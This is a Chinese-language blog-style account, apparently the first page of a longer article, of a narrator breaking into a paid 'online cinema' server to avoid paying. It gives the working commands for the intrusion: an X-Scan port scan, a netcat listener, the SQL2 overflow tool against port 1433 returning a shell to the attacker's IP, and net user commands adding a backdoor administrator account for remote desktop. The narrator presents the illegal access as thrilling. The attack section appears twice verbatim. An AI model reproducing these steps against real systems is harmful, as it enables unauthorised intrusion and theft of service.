黑客入侵“在線影院”全過程

網絡安全精華專題（點擊打開裡面有更多內容） 黑客 蠕蟲 惡意代碼 防火牆 木馬 黑客常用軟件 黑客技術 配置安全系統 IM軟件安全 DOS攻擊 入侵檢測系統 加、解密 手機病毒 病毒防御手冊 後門技術 Linux安全 十大網頁炸彈 04年安全綜述 安全應用知識講座

　　最近對網上看電影比較感興趣，於是登錄至某“在線影院”。本以為是免費，誰知問我要賬號和密碼，我可不想為這個掏錢。怎麼辦？先探探路。對我而言，入侵的過程是充滿樂趣的，它刺激著我大腦的每一根神經，讓我興奮無比。我喜歡體味這種思維無拘放蕩的快感，我喜歡沉醉其中。這是黑客營人的風格。於是，X-Scan開始勤懇地跑在了我的桌面上。

　　破門：久違的溢出工具

　　用X-Scan對該站點的Server掃描結果出來了，開的端口還不少呢：53、80、1433、3389。可並沒有報告說發現有弱口令，看來網管還算比較有責任心。但開了3389端口，意味著可以遠程登錄，這可是微軟給所有Windows用戶獻上的最大的“木馬”。

　　通過觀察，我發現只有在1433端口上下點工夫，想想辦法。何不用SQL2溢出工具試試？

　　先開一個cmd窗口，祭出寶刀netcat，在命令提示符下敲入“netcat -l -p 99”，監聽本地99端口。接著該SQL2出馬了。再打開一個cmd窗口，鍵入“sql2 218.147.*.*  61.157.*.*  0”，其中218.147.*.*是對方IP，61.157.*.*是我自己的IP，回車後提示package sent successful。再回過頭去看看監聽本地端口的netcat，已經變成了C:\WinNT\system32\_，這就是對方機器的系統文件夾了，看來是成功溢出了，就這麼簡單。

　　我很幸運地得到了對方的一個Shell，而且還是administrator權限的。接下來的操作就輕車熟路了，添加用戶，提升權限：在提示符下鍵入“net user hacker 12345 /add”（在對方機器裡創建一個名為hacker，密碼為12345的用戶），再鍵入“net localgroup administrators hacker /add”（把用戶hacker加入到管理員組），接下來就該是3389遠程登錄了。

　　破門：久違的溢出工具

　　用X-Scan對該站點的Server掃描結果出來了，開的端口還不少呢：53、80、1433、3389。可並沒有報告說發現有弱口令，看來網管還算比較有責任心。但開了3389端口，意味著可以遠程登錄，這可是微軟給所有Windows用戶獻上的最大的“木馬”。

　　通過觀察，我發現只有在1433端口上下點工夫，想想辦法。何不用SQL2溢出工具試試？

　　先開一個cmd窗口，祭出寶刀netcat，在命令提示符下敲入“netcat -l -p 99”，監聽本地99端口。接著該SQL2出馬了。再打開一個cmd窗口，鍵入“sql2 218.147.*.*  61.157.*.*  0”，其中218.147.*.*是對方IP，61.157.*.*是我自己的IP，回車後提示package sent successful。再回過頭去看看監聽本地端口的netcat，已經變成了C:\WinNT\system32\_，這就是對方機器的系統文件夾了，看來是成功溢出了，就這麼簡單。

　　我很幸運地得到了對方的一個Shell，而且還是administrator權限的。接下來的操作就輕車熟路了，添加用戶，提升權限：在提示符下鍵入“net user hacker 12345 /add”（在對方機器裡創建一個名為hacker，密碼為12345的用戶），再鍵入“net localgroup administrators hacker /add”（把用戶hacker加入到管理員組），接下來就該是3389遠程登錄了。 12下一頁閱讀全文